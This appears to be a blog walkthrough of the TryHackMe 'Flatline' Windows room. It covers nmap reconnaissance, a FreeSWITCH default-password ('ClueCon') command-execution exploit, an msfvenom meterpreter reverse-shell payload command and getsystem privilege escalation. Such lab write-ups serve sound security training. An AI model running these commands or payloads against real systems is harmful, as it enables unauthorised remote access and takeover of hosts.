Flatline THM Walkthrough
Hellloo everyone!…I am back with another walkthrough of a challenge named “Flatline” recently released on TryHackMe. It is an easy machine and based on compromising a windows system, but nothing to worry about, you just need basics to root it. Here is the link to Flatline room: https://tryhackme.com/room/flatline. One more thing you should know, since, the machine given is windows, it will sometimes take few minutes to respond and will even sometimes fail to respond, but don’t get frustrated and try again to get success in rooting the machine. I’ll be hiding the flags, so that you try it yourself and learn something new. So, lets start!
My tryhackme profile : https://tryhackme.com/p/technoreck
Reconnaissance
Starting with Scanning the machine to find what all ports are open and what service they are running.
nmap -sC -sV -vv -Pn <Target Machine>
Here on Port 8021, we found something interesting, a service named Free SWITCH. Lets see if we can get some exploitation for it on ExploitDB.
Got one Exploit of Command Execution, lets Download it.
Lets try to understand what actually the exploit it doing. So, from the above code we can infer that Free-switch is a kind of gateway with a default password “ClueCon” which allows you to execute any arbitrary command of the host. Lets test it!
Remote Command Execution
noicee! The command worked and we got the name of the User, nekrotic.
Lets Now read the user flag directly using the type command on the user.txt file in the desktop of the user nekrotic.
User Flag
I tried the same with root.txt but it threw an error -ERR no reply.
Now to do the further process and to get the root flag we need a reverse shell for exploiting it. So, we will use msfvenom to make a windows reverse shell payload. Here is the command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > rootkit.exeReverse Shell and Root Flag
Now, by starting a http server on our local machine, we will upload upload this rootkit.exe on the host using Command Execution and also start our listener using Metasploit to receive the Connection from the host after the exploit is executed. This process may take some minutes as the machine is slow.
Boom!, here we are in the host’s system.
Now if you try to run the command “net user”, you’ll get to know that the user nekrotic has administrator privileges but then also we are not able to read the root.txt file, why?
So, most probably the permission of accessing the root.txt file has changed to only system and can only be accessed if you are accessing it as a system default account. Let me better explain you this with an image:
See in the image, here though I am the administrator, If I remove the read permission from my privilege for this particular text file, then the SYSTEM is the only one which can access it, but since I am an admin, I can invoke the system call and tell that I am accessing everything as a SYSTEM. So how can I do that, we can do this with this command:
getsystem
now lets try to read the root.txt file
Voillaa!!! We got the root flag and completed the Challenge.
So this was all from my side, I hope you learnt something new from this and it may had helped you if you were stuck at any moment between the challenge. I’ll see you in the next one, till then learn hacking to hack for good!
